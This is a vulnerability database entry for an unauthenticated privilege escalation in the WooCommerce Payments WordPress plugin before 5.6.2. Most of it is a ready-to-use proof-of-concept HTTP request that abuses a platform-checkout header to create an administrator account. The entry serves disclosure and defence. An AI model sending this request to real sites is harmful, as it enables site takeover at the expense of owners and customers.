Lucene search

K
wpexploitWpvulndbWPEX-ID:0F78A245-866C-462E-BD23-43DFADB57072
HistoryMar 23, 2023 - 12:00 a.m.

WooCommerce Payments < 5.6.2 - Unauthenticated Privilege Escalation

2023-03-2300:00:00
wpvulndb
283
woocommerce payments
unauthenticated
privilege escalation
post request
vulnerability

0.933 High

EPSS

Percentile

99.1%

The plugin has a flaw allowing unauthenticated attackers to create an admin account and take over the blog

POST /wp-json/wp/v2/users HTTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Wcpay-Platform-Checkout-User: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/json

{
  "username": "attacker",
  "email": "[email protected]",
  "password": "attacker-pwd",
  "roles": ["administrator"]
}

0.933 High

EPSS

Percentile

99.1%